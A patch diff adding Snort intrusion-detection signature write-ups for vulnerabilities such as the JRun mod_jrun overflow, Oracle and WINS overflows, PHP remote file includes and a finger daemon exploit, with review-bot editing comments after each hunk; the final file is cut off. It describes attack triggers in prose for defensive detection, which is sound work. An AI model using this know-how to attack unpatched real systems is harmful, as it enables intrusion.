+++ b/doc/signatures/100000122.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+100000122
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow in 
+the Macromedia mod_jrun module.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with the 
+privileges of the server is possible.
+
+--
+Detailed Information:
+Specially crafted data which is sent to the vulnerable server that contains a 
+colon followed by 1,000 or more bytes will trigger this buffer overflow. The 
+affected server will crash, and remote code execution with the privileges of 
+the affected server is possible.
+NOTE: This rule may severely impact performance. It is recommended that you 
+disable this rule if you are not running vulnerable software.
+
+--
+Affected Systems:
+Macromedia ColdFusion MX 6.0
+Macromedia ColdFusion MX 6.1
+Macromedia ColdFusion MX J2EE 6.1
+Macromedia JRun 3.0
+Macromedia JRun 3.1
+Macromedia JRun 4.0
+Hitachi Cosminexus Enterprise Enterprise Edition 01-02
+Hitachi Cosminexus Enterprise Enterprise Edition 01-01
+Hitachi Cosminexus Enterprise Standard Edition 01-02
+Hitachi Cosminexus Enterprise Standard Edition 01-01
+Hitachi Cosminexus Server Web Edition 01-02
+Hitachi Cosminexus Server Web Edition 01-01
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an attack is included as part of the Metasploit vulnerability 
+testing framework.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches are available from Macromedia. As a workaround, the vendor suggests 
+disabling the "verbose" debug mode on web server connectors, as it will stop 
+attackers from exploiting this vulnerability.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
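Review bot: The performance warning in 100000122.txt ("NOTE: This rule may severely impact performance ...") is run straight on from the vulnerability description without a blank line; set it off as its own paragraph, since it is deployment guidance rather than part of the vulnerability description. Attack Scenarios ("A script must be used to exploit this vulnerability") does not describe a scenario; the colon-plus-1,000-bytes trigger from Detailed Information belongs here. Please check whether "Hitachi Cosminexus Enterprise Enterprise Edition" is the intended product name or a doubled word. Additional References is empty although the text cites a Metasploit module and a Macromedia patch, and the blank lines after some "--" separators are inconsistent with the rest of the file.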
--- /dev/null
+++ b/doc/signatures/801.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+801
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a WORD document - e.g. resume.doc.vbs gets displayed as
+resume.doc but is a visual basic script and not a WORD document.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method. Warning:
+A WORD document is in now way more secure than a visual basic script.
+Wrongly configured antivirus software my ignore this files and
+let a macro virus pass.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
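Review bot: several typos in this hunk should be fixed before it lands: "superceded" (Summary) should be "superseded", "in now way more secure" (Attack Scenarios) should be "in no way more secure", and "Wrongly configured antivirus software my ignore this files" should read "may ignore these files". There is also a stray `-` line after "None Known" under False Negatives, and the Affected Systems section is empty; since the Summary says the rule is superseded by sid 721, consider pointing the reader to the sid 721 documentation rather than leaving sections blank.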
--- /dev/null
+++ b/doc/signatures/673.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NGSSoftware Advisory:
+http://www.nextgenss.com/advisories/mssql-jobs2.txt
+
+--
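Review bot: the Sid field at the top of this hunk is empty (the line reads `Sid: ` with no value) although the file is 673.txt; fill in 673 so the doc matches the rule. The third paragraph of Detailed Information ("This connection can either be a legitimate telnet connection or the result of spawning a remote shell ...") reads as if pasted from a telnet rule and does not apply to SQL command traffic; drop it or reword it. Also, "Simple. These are SQL database commands." under Attack Scenarios describes ease of attack rather than a scenario, and "investigate the server for signs of compromise" under Corrective Action is missing its full stop.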
--- /dev/null
+++ b/doc/signatures/510.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+510
+
+--
+Summary:
+This event is generated when an attempt is made to change the message on
+the LCD display on a JetDirect enabled HP printer.
+
+--
+Impact:
+User confusion and comedy, mostly.
+
+--
+Detailed Information:
+HP JetDirect printers allow remote machines to change the message that
+is displayed on the LCD panel via the PJL command. This event indicates
+that this command has been used in network traffic.
+
+--
+Affected Systems:
+	HP JetDirect enabled printers
+ 
+--
+Attack Scenarios:
+As part of an attempt to confuse and annoy users, an attacker may
+attempt to change the message displayed on the printers LCD screen.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to the latest JetDirect, and investigate the possibility of
+restricting access to a central print-server using the "allow: <ip>
+<netmask>" directive in a printer config file. 
+
+Disallow printer use from hosts outside the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
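Review bot: "the printers LCD screen" in Attack Scenarios needs a possessive ("printer's"), and "Update to the latest JetDirect" in Corrective Action should say what is being updated (the JetDirect firmware). The Additional References section is empty; a pointer to HP's PJL documentation would help readers understand the display-message command that Detailed Information says this rule matches.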
--- /dev/null
+++ b/doc/signatures/100000352.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000352
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Blend Portal" application running on a webserver. Access to the file "blend_common.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "blend_common.php" script used by the "Blend Portal" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blend Portal
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
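Review bot: the hunk opens with two blank lines before "Rule:", which the other signature files in this patch do not have; drop them for consistency. In Detailed Information, "running ona web server" should be "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". The third Detailed Information paragraph about "validating the credentials of a client host" is generic CGI boilerplate that does not describe a remote file include through the "phpbb_root_path" parameter; keeping only the first two paragraphs would be clearer.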
--- /dev/null
+++ b/doc/signatures/2650.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2650
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can attempt to connect to a database using an overly
+long user name value. This can cause a buffer overflow, allowing
+an attacker to execute arbitrary code.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+       Oracle8, Oracle8i, and Oracle9i
+
+--
+Attack Scenarios:
+An attacker can attempt to connect to a database supplying the
+user an overly long value.  The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck62.html
+
+--
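Review bot: "a Oracle database" in the Summary should be "an Oracle database", and the Attack Scenarios sentence "supplying the user an overly long value" is awkward; "supplying an overly long user name value" matches the Detailed Information. The $ORACLE_PORTS advice in Detailed Information is sensor configuration guidance rather than a description of the vulnerability, so it would sit better under Corrective Action or in its own NOTE line, stating that it refers to the snort.conf port variable the rule uses. The Affected Systems entry is also indented with a run of spaces where the other files use a single tab.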
--- /dev/null
+++ b/doc/signatures/1660.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Don't have affected systems
+Sid:
+1660
+ 
+--
+Summary:
+This event is generated when an attempt is made to trace previous web requests on the vulnerable server.
+
+--
+Impact:
+Information gathering.  This attack may permit viewing sensitive information such as Session ID values and the paths associated with the web requests.
+
+--
+Detailed Information:
+Microsoft ASP.NET is software used for developing web applications.  It may have tracing enabled to view the previous 50 web requests to the server. At attacker may view sensitive information such as Session ID values and the paths associated withe previous web requests.
+
+--
+Affected Systems:
+
+
+Attack Scenarios:
+An attacker can attempt to access the traced requests to gather information.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Set <trace enabled=false> in web.config
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10993
+
+--
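Review bot: the line "Don't have affected systems" after the first `--` is an author's working note left in the file; remove it, and either fill in the Affected Systems section (which is empty and is also missing the `--` separator before Attack Scenarios) or state that ASP.NET applications with tracing enabled are affected, as Detailed Information implies. Detailed Information has two typos: "At attacker" should be "An attacker" and "associated withe previous" should be "with the previous". Under Corrective Action, `<trace enabled=false>` is not valid web.config syntax; the attribute value must be quoted and the element self-closed, i.e. `<trace enabled="false" />` inside `<system.web>`.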
--- /dev/null
+++ b/doc/signatures/327.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 327
+
+-- 
+
+Summary: 
+This event is generated when a remote command execution exploit against a finger daemon is attempted.
+
+-- 
+
+Impact: 
+Serious. The attacker may be presented with the opportunity to run a command of his choice on the target UNIX system
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable version of the finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack may allow an attacker to execute a command remotely on a target system with the privileges of the user running the "finger" daemon. The user is usually defined in the /etc/inetd.conf file and is commonly designated as "nobody".
+
+--
+Attack Scenarios: 
+An attacker may try the attack and then executes a command to download a backdoor to the target system. He then connects to the system and may attempt to escalate his privileges by exploiting a local SUID application to gain "root" privileges.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted finger query
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0152
+
+Arachnids:
+http://www.whitehats.com/info/IDS380
+
+Bugtraq:
+http://online.securityfocus.com/bid/2220
+
+--
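Review bot: this file has no Affected Systems section at all (the hunk goes from Detailed Information straight to Attack Scenarios), while every other signature doc in the patch carries one; add it, listing the finger daemon versions covered by the CVE-1999-0152 reference. Minor grammar: "An attacker may try the attack and then executes a command" should be "execute", the Impact sentence is missing its full stop, and "Sid: 327" is on one line while the other files put the value on its own line.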
--- /dev/null
+++ b/doc/signatures/433.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+433
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Type 40 datagrams are an indication that a received datagram failed a integrity check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 datagrams are generated when a received datagram fails an integrity check for a given SPI (Security Parameters Index).  ICMP Type 40 datagrams should never be generated with an undefined ICMP Code, this could be an indication of nefarious network activity. 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
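Review bot: several grammar slips in this hunk: "generates and ICMP Type 40 datagram" (Summary) should be "an ICMP Type 40 datagram", "failed a integrity check" (Impact) should be "an integrity check", and "ICMP Type 40 datagrams not normally seen on the network" (Corrective Action) is missing "are". The Additional References entry "RFC2521" would be more useful as a labelled citation with a URL, in the "Name:" followed by URL layout the other files use.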
--- /dev/null
+++ b/doc/signatures/894.txt
@@ -0,0 +1,52 @@
+Rule:
+--
+Sid:
+894
+
+--
+Summary:
+This event is generated when an attempt is made to display historical 
+information from a Big Brother system monitor host.
+
+--
+Impact:
+Information Disclosure.
+
+--
+Detailed Information:
+Big Brother is a monitoring system used by many organisations.  It records both current and historical information about monitored hosts on a network.  Access to the system status is via a series of web pages and CGI scripts.  Version 1.09b & 1.09c contained a bug in bb-hist.sh that could be made to display files accessible by the user under which the CGI script is run.
+
+--
+Attack Scenarios:
+A malicious user could use this vulnerability to gain more information about the Big Brother host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives: 
+None known
+
+--
+Corrective Action:
+Upgrade to a later version of Big Brother at least 1.09d
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References: 
+url,http://bb4.com/
+cve,CAN-1999-1462
+
+
+--
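Review bot: the Additional References entries "url,http://bb4.com/" and "cve,CAN-1999-1462" are written in the rule-file reference keyword syntax rather than the "CVE:" plus URL layout every other signature doc in this patch uses; reformat them for consistency. Also "Original document author unkown" should be "unknown", "Rule:" is not followed by a blank line before the first `--` as in the other files, and "Upgrade to a later version of Big Brother at least 1.09d" needs a comma after "Big Brother" and a full stop.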
--- /dev/null
+++ b/doc/signatures/100000620.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000620
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_view.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
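Review bot: the `--` separators after the Sid, Affected Systems and Contributors sections have no blank line before them, unlike the rest of this file and the other signature docs; add them. "running ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing". As in the other remote file include docs in this patch, the third Detailed Information paragraph about validating client credentials is generic boilerplate unrelated to the "admin_template_path" include and could be dropped.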
--- /dev/null
+++ b/doc/signatures/2833.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2833
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_master_repgroup
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
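Review bot: the sentence in Detailed Information is broken across lines by what looks like a template artifact: "vulnerability in the procedure drop_master_repgroup" is followed by a line beginning ". This procedure is included in"; join them so it reads "... in the procedure drop_master_repgroup. This procedure is included in sys.dbms_repcat_mas." Also "Oracle Oracle9i" under Affected Systems duplicates the vendor name, and "Apply the appropriate vendor supplied patch" is missing its full stop.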
--- /dev/null
+++ b/doc/signatures/3200.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3200
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
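Review bot: "Expoit code exists" under Ease of Attack should be "Exploit code exists", and "multiple malformed request" under Attack Scenarios should be plural. The Detailed Information wording "execution of arbitrary code or a Denial of Service condition can be issued against a host" is awkward; "can be triggered on a host" reads better. "Uninstall the WINS service" under Corrective Action should be qualified as applying only where the service is not needed, since removing it breaks NetBIOS name resolution for clients that depend on it.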
--- /dev/null
+++ b/doc/signatures/2655.txt
@@ -0,0 +1,70 @@
+Rule:
+
+-- 
+Sid:
+2655
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with an HP WebJetAdmin web server.
+
+-- 
+Impact:
+A successful attack may allow the execution of arbitrary code as root on UNIX
+and SYSTEM on Windows on a vulnerable server.
+
+-- 
+Detailed Information:
+The HP Web JetAdmin application allows users to manage HP JetDirect-connected
+printers within their intranet using a browser. The httpd core supports an
+exported function called ExecuteFile. A vulnerability exists that allows the
+uploading and execution of unauthorized files by posting a malicious http
+request with the script /plugins/framework/script/content.hts in conjunction
+with ExecuteFile function to the web server. Discovery of the vulnerability is
+credited to FX of Phenoelit.
+
+-- 
+Affected Systems:
+	HP Web JetAdmin 6.5.
+
+-- 
+Attack Scenarios:
+An attacker can create upload and execute a malicious file on a vulnerable server.
+
+-- 
+Ease of Attack:
+Simple.
+
+-- 
+False Positives:
+None known.
+
+-- 
+False Negatives:
+The default HP Web JetAdmin port is 8000. If an administrator selects a
+different port on which to run the web server, no event will be
+generated. In that case, the rule should be altered to reflect the 
+port on which the web server runs. 
+
+-- 
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+-- 
+Contributors:
+Thomas Alex <talex@edhacker.com>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Phenoelit:
+http://www.phenoelit.de/stuff/HP_Web_Jetadmin_advisory.txt>
+
+Hewlett-Packard:
+http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=PSD_HPSBPI01026
+
+--
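Review bot: the Phenoelit URL under Additional References has a stray trailing `>` ("...HP_Web_Jetadmin_advisory.txt>") that will break the link; remove it. In Attack Scenarios, "An attacker can create upload and execute a malicious file" needs commas ("create, upload and execute"). The False Negatives note about a non-default port is useful; saying where in the rule port 8000 is set would make "the rule should be altered" actionable for the reader.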
--- /dev/null
+++ b/doc/signatures/1017.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1017
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with an extension of .idc.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports file extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request of file with a .idc extension that causes a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+
+--
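Review bot: "send a malformed request of file with a .idc extension" in Attack Scenarios should be "a malformed request for a file with a .idc extension". The reference is labelled "CVE" but the identifier is CAN-1999-0874, a candidate number; the label and link text should agree. There is also a stray line containing a single space after Corrective Action.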
--- /dev/null
+++ b/doc/signatures/3292.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3292
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
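Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed RPC request to an RPC port; reconcile the two so the reader knows what traffic actually triggers the rule. "Expoit code exists" under Ease of Attack should be "Exploit code exists". The firewall advice under Corrective Action is sound, but it is worth adding that blocking 135, 139 and 445 at the perimeter does not protect against hosts already inside the network, so the patch remains the primary fix.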
--- /dev/null
+++ b/doc/signatures/1420.txt
@@ -0,0 +1,77 @@
+Rule:
+ 
+--
+Sid:
+1420
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over TCP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to tcp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
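Review bot: "if sucessful a reply is generated" in Attack Scenarios should be "if successful, a reply is generated". The Summary says the rule fires on an SNMP-Trap connection over TCP, but Detailed Information says the trap daemon listens on "port 162, tcp or udp"; state that this rule covers the TCP case only and, if a companion rule covers UDP, name it. The blank line between the CVE URLs and the closing `--` is doubled; trim it for consistency with the other files.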
--- /dev/null
+++ b/doc/signatures/1373.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1373
+
+--
+Summary:
+Attempted httpd configuration access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
